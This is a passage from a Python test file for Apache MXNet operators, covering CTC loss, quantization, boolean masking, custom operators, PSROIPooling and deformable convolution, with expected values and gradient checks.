[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts, labels, true_loss, contrib=contrib)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels2, true_loss, contrib=contrib)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels3, true_loss, contrib=contrib)
@with_seed()
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
for i in range(seq_len * batch_size) :
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss, expected_loss)
@with_seed()
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label, contrib=False): # from tf
vocab_size = 5
max_label_len = 5
padding_mask = -1+ (blank_label=='first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
if contrib:
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
else:
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l, loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad, grad_truth, atol=1e-5, rtol=1e-5)
for contrib in [False, True]:
for label in ['first', 'last']:
check_ctc_loss_grad(label, contrib=contrib)
@with_seed()
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
@with_seed()
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
@with_seed()
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
mx.set_np_shape(True)
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
mx.set_np_shape(False)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# T times
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
@with_seed()
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
@with_seed()
def test_reciprocal_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 6 below set empirically, depends on eps.
# Issue exposed by seed 879579887.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 6*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
@with_seed()
def test_cbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid finite difference method inaccuracies due to infinite gradient at the origin.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 553872106.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=eps)
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
@with_seed()
def test_rcbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 788174893.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
@with_seed()
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output, expected_output, rtol=rtol, atol=atol)
assert_almost_equal(x2.grad, expected_grad, rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of default implementation of
# infer storage in custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x, np.ones(shape=(10, 10), dtype=np.float32))
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/17467")
@with_seed()
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork in windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
@with_seed()
def test_custom_op_exc():
# test except handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc4)
@with_seed()
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution():
for num_batch in [1, 2]:
for num_channel_data, num_deformable_group in itertools.product([4, 8], [1, 2]):
for input_height, input_width in itertools.product([5, 6], [5, 6]):
for dilate in [(1, 1), (2, 2)]:
for grad_nodes in [['im_data'], ['offset_data'], ['weight']]:
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
weight_var = mx.symbol.Variable(name="weight")
bias_var = mx.symbol.Variable(name="bias")
op = mx.sym.contrib.DeformableConvolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
# if the following condiiton holds, the sampling location is not differentiable
# therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
@with_seed()
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points, the bilinear interpolation function may be non-differentiable
# to avoid this, we check whether the input locates on the valid points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = 1e-7, atol_fw = 1e-9):
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np.random.uniform(1, 10, shape1).astype(dtype)
data_in2 = np.random.uniform(1, 10, shape2).astype(dtype)
data_in3 = np.random.uniform(1, 10, shape3).astype(dtype)
data_in4 = np.random.uniform(1, 10, shape4).astype(dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
